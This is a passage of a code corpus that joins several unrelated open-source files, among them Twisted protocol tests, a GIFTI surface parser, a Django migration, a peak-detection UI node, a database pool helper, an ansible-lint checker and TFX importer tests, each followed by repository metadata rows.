class TestProtocols(unittest.TestCase):
def test_init(self):
prt = [BasicProtocol(), ServerProtocol(Server()), SafeProtocol(Server())]
for p in prt:
from twisted.internet.protocol import Protocol
self.assertTrue(isinstance(p, Protocol))
self.assertFalse(p.opened)
self.assertIsNotNone(p.db)
for p in prt[1:]:
self.assertIsNotNone(p.server)
def test_close(self):
prt = [BasicProtocol(), ServerProtocol(Server()), SafeProtocol(Server())]
for p in prt:
p.transport = Transport()
self.assertFalse(p.transport.lose_connection_called)
p.close()
self.assertTrue(p.transport.lose_connection_called)
def test_close_now(self):
prt = [BasicProtocol(), ServerProtocol(Server()), SafeProtocol(Server())]
for p in prt:
p.transport = Transport()
self.assertFalse(p.transport.abort_connection_called)
p.close_now()
self.assertFalse(p.opened)
self.assertTrue(p.transport.abort_connection_called)
def test_connection_made(self):
prt = [BasicProtocol(), ServerProtocol(Server()), SafeProtocol(Server())]
for p in prt:
p.transport = Transport()
session_factory = SessionFactory(ASession)
p.set_session_factory(session_factory)
self.assertFalse(p.opened)
p.connectionMade()
self.assertTrue(p.opened)
self.assertFalse(p.session.dropped_called)
p.connectionLost()
self.assertFalse(p.opened)
assert 'session' not in p.__dict__
def test_connection_lost(self):
prt = [BasicProtocol(), ServerProtocol(Server()), SafeProtocol(Server())]
for p in prt:
p.transport = Transport()
session_factory = SessionFactory(ASession)
p.set_session_factory(session_factory)
self.assertIsNone(p.session)
p.connectionLost()
self.assertFalse(p.opened)
p.connectionMade()
self.assertTrue(p.opened)
self.assertIsNotNone(p.session)
self.assertFalse(p.session.dropped_called)
p.connectionLost()
self.assertFalse(p.opened)
assert 'session' not in p.__dict__
class TestBasicProtocol(unittest.TestCase):
def test_send_and_receive_message(self):
init_messages()
p = BasicProtocol()
p.transport = Transport()
session_factory = SessionFactory(ASession)
p.set_session_factory(session_factory)
self.assertFalse(p.send_message("123"))
msg = MessageHello()
self.assertFalse(p.send_message(msg))
p.connectionMade()
self.assertTrue(p.send_message(msg))
self.assertEqual(len(p.transport.buff), 1)
p.dataReceived(p.transport.buff[0])
self.assertIsInstance(p.session.msgs[0], MessageHello)
self.assertEquals(msg.timestamp, p.session.msgs[0].timestamp)
time.sleep(1)
msg = MessageHello()
self.assertNotEquals(msg.timestamp, p.session.msgs[0].timestamp)
self.assertTrue(p.send_message(msg))
self.assertEqual(len(p.transport.buff), 2)
db = DataBuffer()
db.append_string(p.transport.buff[1])
m = Message.deserialize(db)[0]
self.assertEqual(m.timestamp, msg.timestamp)
p.connectionLost()
assert 'session' not in p.__dict__
class TestServerProtocol(unittest.TestCase):
def test_connection_made(self):
p = ServerProtocol(Server())
session_factory = SessionFactory(ASession)
p.set_session_factory(session_factory)
p.connectionMade()
self.assertEquals(len(p.server.sessions), 1)
p.connectionLost()
assert 'session' not in p.__dict__
class TestSaferProtocol(unittest.TestCase):
def test_send_and_receive_message(self):
p = SafeProtocol(Server())
p.transport = Transport()
session_factory = SessionFactory(ASession)
p.set_session_factory(session_factory)
self.assertFalse(p.send_message("123"))
msg = MessageHello()
self.assertEqual(msg.sig, "")
self.assertFalse(p.send_message(msg))
p.connectionMade()
self.assertTrue(p.send_message(msg))
self.assertEqual(len(p.transport.buff), 1)
p.dataReceived(p.transport.buff[0])
self.assertIsInstance(p.session.msgs[0], MessageHello)
self.assertEquals(msg.timestamp, p.session.msgs[0].timestamp)
self.assertEqual(msg.sig, "ASessionSign")
p.connectionLost()
assert 'session' not in p.__dict__
| gpl-3.0 | 2,515,513,238,718,722,600 | 34.14604 | 109 | 0.587345 | false |
rajul/tvb-framework | tvb/adapters/uploaders/gifti/parser.py | 1 | 9083 | # -*- coding: utf-8 -*-
#
#
# TheVirtualBrain-Framework Package. This package holds all Data Management, and
# Web-UI helpful to run brain-simulations. To use it, you also need do download
# TheVirtualBrain-Scientific Package (for simulators). See content of the
# documentation-folder for more details. See also http://www.thevirtualbrain.org
#
# (c) 2012-2013, Baycrest Centre for Geriatric Care ("Baycrest")
#
# This program is free software; you can redistribute it and/or modify it under
# the terms of the GNU General Public License version 2 as published by the Free
# Software Foundation. This program is distributed in the hope that it will be
# useful, but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public
# License for more details. You should have received a copy of the GNU General
# Public License along with this program; if not, you can download it here
# http://www.gnu.org/licenses/old-licenses/gpl-2.0
#
#
# CITATION:
# When using The Virtual Brain for scientific publications, please cite it as follows:
#
# Paula Sanz Leon, Stuart A. Knock, M. Marmaduke Woodman, Lia Domide,
# Jochen Mersmann, Anthony R. McIntosh, Viktor Jirsa (2013)
# The Virtual Brain: a simulator of primate brain network dynamics.
# Frontiers in Neuroinformatics (7:10. doi: 10.3389/fninf.2013.00010)
#
#
"""
.. moduleauthor:: Mihai Andrei <[email protected]>
.. moduleauthor:: Calin Pavel <[email protected]>
"""
import os
import numpy as np
from nibabel.gifti import giftiio
from nibabel.nifti1 import intent_codes, data_type_codes
from tvb.basic.logger.builder import get_logger
from tvb.core.adapters.exceptions import ParseException
from tvb.datatypes.surfaces import CorticalSurface, center_vertices, make_surface
from tvb.datatypes.time_series import TimeSeriesSurface
OPTION_READ_METADATA = "ReadFromMetaData"
class GIFTIParser(object):
"""
This class reads content of a GIFTI file and builds / returns a Surface instance
filled with details.
"""
UNIQUE_ID_ATTR = "UniqueID"
SUBJECT_ATTR = "SubjectID"
ASP_ATTR = "AnatomicalStructurePrimary"
DATE_ATTR = "Date"
DESCRIPTION_ATTR = "Description"
NAME_ATTR = "Name"
TIME_STEP_ATTR = "TimeStep"
def __init__(self, storage_path, operation_id):
self.logger = get_logger(__name__)
self.storage_path = storage_path
self.operation_id = operation_id
@staticmethod
def _get_meta_dict(data_array):
data_array_meta = data_array.meta
if data_array_meta is None or data_array_meta.data is None:
return {}
return dict((meta_pair.name, meta_pair.value) for meta_pair in data_array_meta.data)
@staticmethod
def _is_surface_gifti(data_arrays):
return (len(data_arrays) == 2
and intent_codes.code["NIFTI_INTENT_POINTSET"] == data_arrays[0].intent
and data_type_codes.code["NIFTI_TYPE_FLOAT32"] == data_arrays[0].datatype
and intent_codes.code["NIFTI_INTENT_TRIANGLE"] == data_arrays[1].intent
and data_type_codes.code["NIFTI_TYPE_INT32"] == data_arrays[1].datatype)
@staticmethod
def _is_timeseries_gifti(data_arrays):
return (len(data_arrays) > 1
and intent_codes.code["NIFTI_INTENT_TIME_SERIES"] == data_arrays[0].intent
and data_type_codes.code["NIFTI_TYPE_FLOAT32"] == data_arrays[0].datatype)
def _parse_surface(self, data_arrays, data_arrays_part2, surface_type, should_center):
meta_dict = self._get_meta_dict(data_arrays[0])
anatomical_structure_primary = meta_dict.get(self.ASP_ATTR)
gid = meta_dict.get(self.UNIQUE_ID_ATTR)
subject = meta_dict.get(self.SUBJECT_ATTR)
title = meta_dict.get(self.NAME_ATTR)
# Now try to determine what type of surface we have
# If a surface type is not explicitly given we use the type specified in the metadata
if surface_type == OPTION_READ_METADATA:
surface_type = anatomical_structure_primary
if surface_type is None:
raise ParseException("Please specify the type of the surface")
surface = make_surface(surface_type)
if surface is None:
raise ParseException("Could not determine surface type! %s" % surface_type)
# Now fill TVB data type with metadata
if gid is not None:
gid = gid.replace("{", "").replace("}", "")
surface.gid = gid
if subject is not None:
surface.subject = subject
if title is not None:
surface.title = title
surface.storage_path = self.storage_path
surface.set_operation_id(self.operation_id)
surface.zero_based_triangles = True
# Now fill TVB data type with geometry data
vertices = data_arrays[0].data
triangles = data_arrays[1].data
vertices_in_lh = len(vertices)
# If a second file is present append that data
if data_arrays_part2 is not None:
# offset the indices
offset = len(vertices)
vertices = np.vstack([vertices, data_arrays_part2[0].data])
triangles = np.vstack([triangles, offset + data_arrays_part2[1].data])
if should_center:
vertices = center_vertices(vertices)
# set hemisphere mask if cortex
if isinstance(surface, CorticalSurface):
# if there was a 2nd file then len(vertices) != vertices_in_lh
surface.hemisphere_mask = np.zeros(len(vertices), dtype=np.bool)
surface.hemisphere_mask[vertices_in_lh:] = 1
surface.vertices = vertices
surface.triangles = triangles
return surface
def _parse_timeseries(self, data_arrays):
# Create TVB time series to be filled
time_series = TimeSeriesSurface()
time_series.storage_path = self.storage_path
time_series.set_operation_id(self.operation_id)
time_series.start_time = 0.0
time_series.sample_period = 1.0
        # First process the first data_array and extract important data from its metadata
meta_dict = self._get_meta_dict(data_arrays[0])
gid = meta_dict.get(self.UNIQUE_ID_ATTR)
sample_period = meta_dict.get(self.TIME_STEP_ATTR)
time_series.subject = meta_dict.get(self.SUBJECT_ATTR)
time_series.title = meta_dict.get(self.NAME_ATTR)
if gid:
time_series.gid = gid.replace("{", "").replace("}", "")
if sample_period:
time_series.sample_period = float(sample_period)
# todo : make sure that write_time_slice is not required here
# Now read time series data
for data_array in data_arrays:
time_series.write_data_slice([data_array.data])
# Close file after writing data
time_series.close_file()
return time_series
def parse(self, data_file, data_file_part2=None, surface_type=OPTION_READ_METADATA, should_center=False):
"""
        Parse GIFTI file(s) and return a Surface or a TimeSeries built from them.
        :param surface_type: one of "Cortex", "Head", "ReadFromMetaData"
:param data_file_part2: a file containing the second part of the surface
"""
self.logger.debug("Start to parse GIFTI file: %s" % data_file)
if data_file is None:
raise ParseException("Please select GIFTI file which contains data to import")
if not os.path.exists(data_file):
raise ParseException("Provided file %s does not exists" % data_file)
if data_file_part2 is not None and not os.path.exists(data_file_part2):
raise ParseException("Provided file part %s does not exists" % data_file_part2)
try:
gifti_image = giftiio.read(data_file)
data_arrays = gifti_image.darrays
self.logger.debug("File parsed successfully")
if data_file_part2 is not None:
data_arrays_part2 = giftiio.read(data_file_part2).darrays
else:
data_arrays_part2 = None
except Exception, excep:
self.logger.exception(excep)
msg = "File: %s does not have a valid GIFTI format." % data_file
raise ParseException(msg)
self.logger.debug("Determine data type stored in GIFTI file")
# First check if it's a surface
if self._is_surface_gifti(data_arrays):
            # If a second part exists it must be of the same type
if data_arrays_part2 is not None and not self._is_surface_gifti(data_arrays_part2):
raise ParseException("Second file must be a surface too")
return self._parse_surface(data_arrays, data_arrays_part2, surface_type, should_center)
elif self._is_timeseries_gifti(data_arrays):
return self._parse_timeseries(data_arrays)
else:
raise ParseException("Could not map data from GIFTI file to a TVB data type") | gpl-2.0 | 4,596,486,521,529,889,300 | 40.479452 | 109 | 0.654519 | false |
jarifibrahim/ashoka-dashboard | dashboard/migrations/0012_auto_20161210_1033.py | 1 | 3097 | # -*- coding: utf-8 -*-
# Generated by Django 1.10.3 on 2016-12-10 05:03
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('dashboard', '0011_auto_20161209_2249'),
]
operations = [
migrations.AddField(
model_name='email',
name='active',
field=models.BooleanField(default=False, help_text='If this field is set to ON all the emails of the specified type will use this template. Each type of email can have only one default', verbose_name='Use this as default template of its type?'),
),
migrations.AddField(
model_name='email',
name='name',
field=models.CharField(default='A', help_text='Template name to uniquely identify it.', max_length=200, verbose_name='Name of the Template'),
preserve_default=False,
),
migrations.AlterField(
model_name='email',
name='message',
field=models.TextField(help_text="If you wish to include the url to consultant form in the email, please add 'FORM_URL' (without quotes) placeholder. It will be replaced by the actual consultant url in the email.", verbose_name='Body of the Email'),
),
migrations.AlterField(
model_name='email',
name='type',
field=models.CharField(choices=[('IM', 'Instruction Mail'), ('RM', 'Reminder Mail')], help_text='Type of the template. Currently Instruction Email template and Reminder Email template are supported.', max_length=5, verbose_name='Type of Email'),
),
migrations.AlterField(
model_name='teamstatus',
name='automatic_reminder',
field=models.BooleanField(default=True, help_text='Should periodic Automatic Reminders Emails be sent?', verbose_name='Send Automatic Reminders?'),
),
migrations.AlterField(
model_name='teamstatus',
name='call_change_count',
field=models.IntegerField(default=0, help_text='This value will be added to total calls count.', verbose_name='Add/Subtract Total Calls count'),
),
migrations.AlterField(
model_name='teamstatus',
name='kick_off',
field=models.CharField(choices=[('NS', 'Not Started'), ('IMS', 'Intro Mail Sent'), ('DA', 'Date Arranged'), ('CH', 'Call Happened')], default='NS', max_length=5, verbose_name='Kick Off Status'),
),
migrations.AlterField(
model_name='teamstatus',
name='last_automatic_reminder',
field=models.DateTimeField(blank=True, editable=False, null=True, verbose_name='Last automatic reminder sent on'),
),
migrations.AlterField(
model_name='teamstatus',
name='mid_term',
field=models.CharField(choices=[('NS', 'Not Started'), ('IMS', 'Intro Mail Sent'), ('DA', 'Date Arranged'), ('CH', 'Call Happened')], default='NS', max_length=5, verbose_name='Mid Term Status'),
),
]
| apache-2.0 | 2,860,983,926,016,569,000 | 49.770492 | 261 | 0.619309 | false |
cdd1969/pygwa | lib/flowchart/nodes/n08_detectpeaks_v2/node_detectpeaks_v2.py | 1 | 11749 | #!/usr/bin python
# -*- coding: utf-8 -*-
from pyqtgraph import BusyCursor
from pyqtgraph.Qt import QtGui
import numpy as np
from lib.flowchart.nodes.generalNode import NodeWithCtrlWidget, NodeCtrlWidget
from lib.functions.general import isNumpyDatetime, isNumpyNumeric
from lib.functions.detectpeaks import full_peak_detection_routine, prepare_order, prepare_datetime
class detectPeaksTSNode_v2(NodeWithCtrlWidget):
"""Detect peaks (minima/maxima) from passed TimeSeries, check period"""
nodeName = "Detect Peaks (v2)"
uiTemplate = [
{'title': 'data', 'name': 'column', 'type': 'list', 'value': None, 'default': None, 'values': [None], 'tip': 'Column name with hydrograph data'},
{'name': 'datetime', 'type': 'list', 'value': None, 'default': None, 'values': [None], 'tip': 'Location of the datetime objects.'},
{'name': 'Peak Detection Params', 'type': 'group', 'children': [
{'name': 'T', 'type': 'float', 'value': 12.42, 'default': 12.42, 'suffix': ' hours', 'tip': 'Awaited period of the signal in hours.'},
{'title': 'dt', 'name': 'hMargin', 'type': 'float', 'value': 1.5, 'default': 1.5, 'limits': (0., 100.), 'suffix': ' hours', 'tip': 'Number of hours, safety margin when comparing period length.\nSee formula below:\nT/2 - dt < T_i/2 < T/2 + dt'},
{'name': 'order', 'type': 'str', 'value': '?', 'readonly': True, 'tip': 'How many points on each side to use for the comparison'},
{'name': 'mode', 'type': 'list', 'values': ['clip', 'wrap'], 'value': 'clip', 'default': 'clip', 'tip': 'How the edges of the vector are treated. ‘wrap’ (wrap around)\nor ‘clip’ (treat overflow as the same as the last (or first) element)'},
{'name': 'removeRegions', 'type': 'bool', 'value': True, 'readonly': True, 'default': True, 'visible': False, 'tip': "remove possible multiple peaks that go one-by-one"}
]},
        {'title': 'Ignore peaks', 'name': 'ignore', 'type': 'bool', 'value': False, 'default': False, 'tip': 'Checkbox to ignore peaks that are mentioned in parameter `Peak IDs`', 'children': [
{'title': 'Peak IDs', 'name': 'peaks2ignore', 'type': 'str', 'value': '', 'default': '', 'tip': 'IDs of the peaks that will be ignored. IDs can be found in table in terminal `raw`. \nInteger or a comma-separated integer list.\n Example:\n12\n0, 12, 1153'},
]},
{'title': 'Plausibility Check Params', 'name': 'check_grp', 'type': 'group', 'children': [
{'title': 'Neighbour MIN peaks', 'name': 'MIN_grp', 'type': 'group', 'children': [
{'title': 'Valid Period\n(lower border)', 'name': 'range1', 'type': 'float', 'value': 10.0, 'default': 10., 'suffix': ' hours', 'tip': 'Lower border of the valid time-distance between two neigbour MIN peaks'},
{'title': 'Valid Period\n(upper border)', 'name': 'range2', 'type': 'float', 'value': 15.0, 'default': 15., 'suffix': ' hours', 'tip': 'Upper border of the valid time-distance between two neigbour MIN peaks'},
{'title': 'Warnings (MIN)', 'name': 'warn', 'type': 'str', 'value': '?', 'default': '?', 'readonly': True}
]},
{'title': 'Neighbour MAX peaks', 'name': 'MAX_grp', 'type': 'group', 'children': [
{'title': 'Valid Period\n(lower border)', 'name': 'range1', 'type': 'float', 'value': 10.0, 'default': 10., 'suffix': ' hours', 'tip': 'Lower border of the valid time-distance between two neigbour MAX peaks'},
{'title': 'Valid Period\n(upper border)', 'name': 'range2', 'type': 'float', 'value': 15.0, 'default': 15., 'suffix': ' hours', 'tip': 'Upper border of the valid time-distance between two neigbour MAX peaks'},
{'title': 'Warnings (MAX)', 'name': 'warn', 'type': 'str', 'value': '?', 'default': '?', 'readonly': True}
]},
{'title': 'Neighbour ALL peaks', 'name': 'ALL_grp', 'type': 'group', 'children': [
{'title': 'Valid Period\n(lower border)', 'name': 'range1', 'type': 'float', 'value': 4.0, 'default': 4., 'suffix': ' hours', 'tip': 'Lower border of the valid time-distance between two neigbour peaks (MIN or MAX)'},
{'title': 'Valid Period\n(upper border)', 'name': 'range2', 'type': 'float', 'value': 9.0, 'default': 9., 'suffix': ' hours', 'tip': 'Upper border of the valid time-distance between two neigbour peaks (MIN or MAX)'},
{'title': 'Warnings (ALL)', 'name': 'warn', 'type': 'str', 'value': '?', 'default': '?', 'readonly': True}
]},
{ 'title': 'Warnings (Total)', 'name': 'warn_sum', 'type': 'str', 'value': '?', 'default': '?', 'readonly': True},
]},
{'title': 'Output', 'name': 'out_grp', 'type': 'group', 'children': [
{ 'title': 'Raw Minimums', 'name': 'raw_nmin', 'type': 'str', 'value': '?', 'default': '?', 'readonly': True},
{ 'title': 'Raw Maximums', 'name': 'raw_nmax', 'type': 'str', 'value': '?', 'default': '?', 'readonly': True},
{ 'title': 'Raw Number\nof Mins+Maxs', 'name': 'raw_n_all', 'type': 'str', 'value': '?', 'default': '?', 'readonly': True},
{ 'title': 'Final Number\nof Cycles', 'name': 'n_cycles', 'type': 'str', 'value': '?', 'default': '?', 'readonly': True}
]},
{'name': 'Plot', 'type': 'action'}]
def __init__(self, name, parent=None):
super(detectPeaksTSNode_v2, self).__init__(name, parent=parent, terminals={'In': {'io': 'in'}, 'raw': {'io': 'out'}, 'peaks': {'io': 'out'}}, color=(250, 250, 150, 150))
self._plotRequired = False
def _createCtrlWidget(self, **kwargs):
return detectPeaksTSNode_v2CtrlWidget(**kwargs)
def process(self, In):
df = In
self.CW().param('check_grp', 'MIN_grp', 'warn').setValue('?')
self.CW().param('check_grp', 'MAX_grp', 'warn').setValue('?')
self.CW().param('check_grp', 'ALL_grp', 'warn').setValue('?')
self.CW().param('check_grp', 'warn_sum').setValue('?')
self.CW().param('out_grp', 'raw_nmin').setValue('?')
self.CW().param('out_grp', 'raw_nmax').setValue('?')
self.CW().param('out_grp', 'raw_n_all').setValue('?')
self.CW().param('out_grp', 'n_cycles').setValue('?')
self.CW().param('Peak Detection Params', 'order').setValue('?')
if df is None:
return {'raw': None, 'peaks': None}
colname = [col for col in df.columns if isNumpyNumeric(df[col].dtype)]
self.CW().param('column').setLimits(colname)
colname = [col for col in df.columns if isNumpyDatetime(df[col].dtype)]
self.CW().param('datetime').setLimits(colname)
kwargs = self.CW().prepareInputArguments()
kwargs['split'] = True
with BusyCursor():
kwargs['order'] = prepare_order(kwargs['T'], kwargs['hMargin'], prepare_datetime(df, datetime=kwargs['datetime']))
self.CW().param('Peak Detection Params', 'order').setValue(str(kwargs['order']))
#peaks = detectPeaks_ts(df, kwargs.pop('column'), plot=self._plotRequired, **kwargs)
extra, raw, peaks = full_peak_detection_routine(df, col=kwargs.pop('column'), date_col=kwargs.pop('datetime'),
IDs2mask=kwargs.pop('IDs2mask'), valid_range=kwargs.pop('valid_range'),
plot=self._plotRequired,
**kwargs)
n_warn_min = len(extra['warnings']['MIN'])
n_warn_max = len(extra['warnings']['MAX'])
n_warn_all = len(extra['warnings']['ALL'])
self.CW().param('check_grp', 'MIN_grp', 'warn').setValue(n_warn_min)
self.CW().param('check_grp', 'MAX_grp', 'warn').setValue(n_warn_max)
self.CW().param('check_grp', 'ALL_grp', 'warn').setValue(n_warn_all)
self.CW().param('check_grp', 'warn_sum').setValue(n_warn_min + n_warn_max + n_warn_all)
self.CW().param('out_grp', 'raw_nmin').setValue(extra['raw_nmin'])
self.CW().param('out_grp', 'raw_nmax').setValue(extra['raw_nmax'])
if raw is not None: self.CW().param('out_grp', 'raw_n_all').setValue(len(raw.index))
if peaks is not None: self.CW().param('out_grp', 'n_cycles').setValue(len(peaks.index))
return {'raw': raw, 'peaks': peaks}
def plot(self):
self._plotRequired = True
self._plotRequired = self.check_n_warnings()
self.update()
self._plotRequired = False
def check_n_warnings(self):
n = self.CW().param('check_grp', 'warn_sum').value()
if n == '?':
return True
if int(n) > 100:
reply = QtGui.QMessageBox.question(None, 'Too many Warnings!',
"You are going to plot {0} peak-warnings!\nThis will be slow and not informative!\n\nDo you really want to create the plot?".format(n),
QtGui.QMessageBox.Yes | QtGui.QMessageBox.No, QtGui.QMessageBox.No)
if reply == QtGui.QMessageBox.No:
return False
elif reply == QtGui.QMessageBox.Yes:
return True
else:
return True
class detectPeaksTSNode_v2CtrlWidget(NodeCtrlWidget):
def __init__(self, **kwargs):
super(detectPeaksTSNode_v2CtrlWidget, self).__init__(update_on_statechange=True, **kwargs)
self.disconnect_valueChanged2upd(self.param('Peak Detection Params', 'order'))
self.disconnect_valueChanged2upd(self.param('check_grp', 'MIN_grp', 'warn'))
self.disconnect_valueChanged2upd(self.param('check_grp', 'MAX_grp', 'warn'))
self.disconnect_valueChanged2upd(self.param('check_grp', 'ALL_grp', 'warn'))
self.disconnect_valueChanged2upd(self.param('check_grp', 'warn_sum'))
self.disconnect_valueChanged2upd(self.param('out_grp', 'raw_nmin'))
self.disconnect_valueChanged2upd(self.param('out_grp', 'raw_nmax'))
self.disconnect_valueChanged2upd(self.param('out_grp', 'n_cycles'))
self.disconnect_valueChanged2upd(self.param('out_grp', 'raw_n_all'))
self.param('Plot').sigActivated.connect(self._parent.plot)
def prepareInputArguments(self):
kwargs = dict()
kwargs['column'] = self.param('column').value()
kwargs['datetime'] = self.param('datetime').value()
kwargs['T'] = self.param('Peak Detection Params', 'T').value()
kwargs['hMargin'] = self.param('Peak Detection Params', 'hMargin').value()
kwargs['mode'] = self.param('Peak Detection Params', 'mode').value()
kwargs['IDs2mask'] = [int(val) for val in self.param('ignore', 'peaks2ignore').value().split(',')] if (self.param('ignore').value() is True and self.param('ignore', 'peaks2ignore').value() != '') else []
kwargs['removeRegions'] = self.param('Peak Detection Params', 'removeRegions').value()
kwargs['valid_range'] = {
'MIN': [np.timedelta64(int(self.param('check_grp', 'MIN_grp', 'range1').value()*3600), 's'),
np.timedelta64(int(self.param('check_grp', 'MIN_grp', 'range2').value()*3600), 's')],
'MAX': [np.timedelta64(int(self.param('check_grp', 'MAX_grp', 'range1').value()*3600), 's'),
np.timedelta64(int(self.param('check_grp', 'MAX_grp', 'range2').value()*3600), 's')],
'ALL': [np.timedelta64(int(self.param('check_grp', 'ALL_grp', 'range1').value()*3600), 's'),
np.timedelta64(int(self.param('check_grp', 'ALL_grp', 'range2').value()*3600), 's')]
}
return kwargs
| gpl-2.0 | -2,258,799,015,408,088,600 | 68.064706 | 268 | 0.570224 | false |
pulsar-chem/Pulsar-Core | lib/systems/l-leucine.py | 1 | 1231 | import pulsar as psr
def load_ref_system():
""" Returns l-leucine as found in the IQMol fragment library.
All credit to https://github.com/nutjunkie/IQmol
"""
return psr.make_system("""
H 0.3678 -1.3008 0.4056
C 0.5471 -0.3960 -0.2429
N 2.0124 -0.1721 -0.2619
H 2.3296 -0.0107 0.6710
H 2.2351 0.6192 -0.8294
C -0.2810 0.7693 0.3217
H 0.0653 1.7342 -0.1027
H -1.3362 0.6643 -0.0026
C -0.2335 0.8255 1.8505
H 0.8348 0.8722 2.1782
C -0.8684 -0.4159 2.4566
H -0.7192 -0.4539 3.5427
H -0.4280 -1.3286 2.0209
H -1.9499 -0.4521 2.2695
C -0.9374 2.0778 2.3462
H -0.9140 2.1367 3.4421
H -1.9919 2.0983 2.0389
H -0.4635 2.9879 1.9557
C 0.0963 -0.6776 -1.6698
O 0.2328 0.0062 -2.6676
O -0.5612 -1.8476 -1.8380
H -0.7998 -1.9596 -2.7530
""")
| bsd-3-clause | -8,902,193,450,787,371,000 | 41.448276 | 65 | 0.39805 | false |
lfblogs/aio2py | aio2py/db/pool.py | 1 | 1541 | # -*- coding: UTF-8 -*-
__author__ = "Liu Fei"
__github__ = "http://github.com/lfblogs"
__all__ = [
"Pool"
]
"""
Define database connection pool
"""
import asyncio
import logging
try:
import aiomysql
except ImportError:
from aio2py.required import aiomysql
try:
import aiopg
except ImportError:
from aio2py.required import aiopg
logging.basicConfig(level=logging.INFO)
@asyncio.coroutine
def Pool(loop,**kw):
logging.info('Create database connection pool...')
global __pool
ENGINE = kw.get('ENGINE',None)
if not ENGINE:
        raise KeyError('Database ENGINE not found in conf files...')
if ENGINE == 'mysql':
__pool = yield from aiomysql.create_pool(
host = kw.get('host', ''),
port = kw.get('port', 3306),
user = kw.get('user', ''),
password = kw.get('password', ''),
db = kw.get('db', ''),
charset = kw.get('charset', 'utf8'),
autocommit = kw.get('autocommit', True),
maxsize = kw.get('maxsize', 10),
minsize = kw.get('minsize', 1),
loop = loop
)
elif ENGINE == 'postgresql':
__pool = yield from aiopg.pool.create_pool(
host = kw.get('host', ''),
port = kw.get('port', 5432),
user = kw.get('user', ''),
password = kw.get('password', ''),
database = kw.get('db', ''),
maxsize = kw.get('maxsize', 10),
minsize = kw.get('minsize', 1),
loop = loop
)
else:
raise KeyError('Database ENGINE Error...') | apache-2.0 | 8,201,426,354,376,966,000 | 23.09375 | 68 | 0.55743 | false |
lpenz/omnilint | container/omnilint/checkers/ansibleplaybooks.py | 1 | 1902 | # Copyright (C) 2020 Leandro Lisboa Penz <[email protected]>
# This file is subject to the terms and conditions defined in
# file 'LICENSE', which is part of this source code package.
'''ansible playbook checker'''
import yaml
import subprocess
import re
from omnilint.error import Error
from omnilint.checkers import Checker
class AnsiblePlaybook(Checker):
extensions = ['yaml', 'yml']
def __init__(self):
super(AnsiblePlaybook, self).__init__()
def isplaybook(self, data):
if not isinstance(data, list):
return False
for e in data:
if not isinstance(e, dict):
return False
if 'import_playbook' in e:
return True
if 'hosts' in e:
return True
return False
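    # For reference (added here, not in the original checker): the smallest YAML
    # documents that isplaybook() accepts are a list of plays or playbook
    # imports, for example
    #
    #     - hosts: all
    #       tasks: []
    #
    # or
    #
    #     - import_playbook: site.yml
    #
    # Anything that is not a list of dicts carrying a 'hosts' or
    # 'import_playbook' key is skipped, so variable files and plain task files
    # are ignored by this checker.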
def check(self, reporter, origname, tmpname, firstline, fd):
try:
            data = yaml.safe_load(fd)
except yaml.YAMLError:
# This is reported by the yaml checker:
return
if not self.isplaybook(data):
return
with subprocess.Popen(
['/usr/local/bin/ansible-lint', '-p', '--nocolor', tmpname],
stdout=subprocess.PIPE,
env={'HOME': '/tmp'}) as p:
regex = re.compile(''.join([
'^(?P<path>[^:]+)', ':(?P<line>[0-9]+)', ': (?P<message>.*)$'
]))
for line in p.stdout:
line = line.decode('utf-8').rstrip()
m = regex.match(line)
assert m
reporter.report(
Error(msg=m.group('message'),
file=m.group('path'),
line=int(m.group('line'))))
def register(omnilint):
'''Registration function, called by omnilint while loading the checker with
itself as argument'''
omnilint.register(AnsiblePlaybook)
| mit | -1,433,899,188,108,483,600 | 29.677419 | 79 | 0.538381 | false |
tensorflow/tfx | tfx/dsl/components/common/importer_test.py | 1 | 6142 | # Copyright 2019 Google LLC. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for tfx.dsl.components.common.importer."""
import tensorflow as tf
from tfx import types
from tfx.dsl.components.common import importer
from tfx.orchestration import data_types
from tfx.orchestration import metadata
from tfx.types import artifact_utils
from tfx.types import standard_artifacts
from tfx.utils import json_utils
from ml_metadata.proto import metadata_store_pb2
class ImporterTest(tf.test.TestCase):
def testImporterDefinitionWithSingleUri(self):
impt = importer.Importer(
source_uri='m/y/u/r/i',
properties={
'split_names': '["train", "eval"]',
},
custom_properties={
'str_custom_property': 'abc',
'int_custom_property': 123,
},
artifact_type=standard_artifacts.Examples).with_id('my_importer')
self.assertDictEqual(
impt.exec_properties, {
importer.SOURCE_URI_KEY: 'm/y/u/r/i',
importer.REIMPORT_OPTION_KEY: 0,
})
self.assertEmpty(impt.inputs)
output_channel = impt.outputs[importer.IMPORT_RESULT_KEY]
self.assertEqual(output_channel.type, standard_artifacts.Examples)
# Tests properties in channel.
self.assertEqual(output_channel.additional_properties, {
'split_names': '["train", "eval"]',
})
self.assertEqual(output_channel.additional_custom_properties, {
'str_custom_property': 'abc',
'int_custom_property': 123,
})
# Tests properties in artifact.
output_artifact = list(output_channel.get())[0]
self.assertEqual(output_artifact.split_names, '["train", "eval"]')
self.assertEqual(
output_artifact.get_string_custom_property('str_custom_property'),
'abc')
self.assertEqual(
output_artifact.get_int_custom_property('int_custom_property'), 123)
def testImporterDumpsJsonRoundtrip(self):
component_id = 'my_importer'
source_uris = ['m/y/u/r/i']
impt = importer.Importer(
source_uri=source_uris,
artifact_type=standard_artifacts.Examples).with_id(component_id)
# The following line will raise an assertion if object not JSONable.
json_text = json_utils.dumps(impt)
actual_obj = json_utils.loads(json_text)
self.assertEqual(actual_obj.id, component_id)
self.assertEqual(actual_obj._source_uri, source_uris)
class ImporterDriverTest(tf.test.TestCase):
def setUp(self):
super().setUp()
self.connection_config = metadata_store_pb2.ConnectionConfig()
self.connection_config.sqlite.SetInParent()
self.properties = {
'split_names': artifact_utils.encode_split_names(['train', 'eval'])
}
self.custom_properties = {
'string_custom_property': 'abc',
'int_custom_property': 123,
}
self.output_dict = {
importer.IMPORT_RESULT_KEY:
types.Channel(
type=standard_artifacts.Examples,
additional_properties=self.properties,
additional_custom_properties=self.custom_properties)
}
